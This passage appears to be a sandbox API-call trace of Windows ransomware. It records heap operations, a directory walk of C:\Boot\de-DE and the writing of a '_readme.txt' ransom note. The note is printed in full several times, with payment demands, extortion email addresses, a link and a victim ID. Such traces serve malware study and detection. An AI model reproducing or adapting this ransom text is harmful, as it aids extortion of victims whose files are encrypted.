(HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.483] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.483] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.483] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.483] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.483] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.484] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.484] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.484] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.484] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.484] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.484] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.484] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.484] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.484] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.484] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.484] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.484] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.484] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0228.485] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.485] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.485] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.485] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.485] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.485] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.485] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.485] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.485] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.485] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.485] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.485] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.485] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.485] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.485] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.485] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.485] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.485] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.485] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.485] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.485] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.485] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.485] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.485] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.485] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.485] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.486] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.486] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.486] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.486] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.486] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.486] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.486] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.486] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.486] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.486] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.486] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.486] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.486] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.486] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.486] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.486] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.486] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.486] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.486] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.486] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.486] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.486] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.486] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.486] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.486] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.486] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.486] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.486] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.486] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.486] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.486] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.486] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.486] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.487] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.487] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.487] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.487] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.487] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.487] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.487] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.487] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.487] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.487] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.487] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.487] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.487] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.487] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.487] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.487] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.488] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.488] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.488] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.488] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.488] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.488] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.488] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.488] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.488] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.488] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.488] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.488] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.488] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.488] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.488] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.488] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.488] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.488] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.488] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.488] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.488] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.488] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.488] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.488] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.488] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.488] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.488] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.488] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.488] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.488] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.488] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.488] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.488] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.488] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.489] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.489] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.489] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.489] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.489] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.489] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.489] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.489] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.489] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.489] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.489] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.489] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.489] PathFindFileNameW (pszPath="C:\\Boot\\de-DE\\") returned="de-DE\\" [0228.489] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd450 [0228.489] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0228.489] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.489] PathFindFileNameW (pszPath="") returned="" [0228.489] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd450 [0228.489] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75330000 [0228.490] GetProcAddress (hModule=0x75330000, lpProcName="SHGetFolderPathW") returned 0x753b5708 [0228.490] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x800) returned 0x3b78058 [0228.490] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b78058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0228.490] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x3466428 [0228.490] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.490] FreeLibrary (hLibModule=0x75330000) returned 1 [0228.490] PathAppendW (in: pszPath="C:\\Boot\\de-DE\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\de-DE\\_readme.txt") returned 1 [0228.490] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.490] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b79140 | out: hHeap=0x620000) returned 1 [0228.490] PathFileExistsW (pszPath="C:\\Boot\\de-DE\\_readme.txt") returned 0 [0228.491] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x3b7b818 [0228.491] lstrcpyW (in: lpString1=0x3b7b818, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" [0228.491] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda", lpString2="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" [0228.491] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3467538 [0228.491] CreateFileW (lpFileName="C:\\Boot\\de-DE\\_readme.txt" (normalized: "c:\\boot\\de-de\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.492] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3467538 | out: hHeap=0x620000) returned 1 [0228.492] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b818 | out: hHeap=0x620000) returned 1 [0228.492] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.492] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79140 [0228.492] FindFirstFileW (in: lpFileName="C:\\Boot\\de-DE\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.492] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b79140 | out: hHeap=0x620000) returned 1 [0228.492] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, 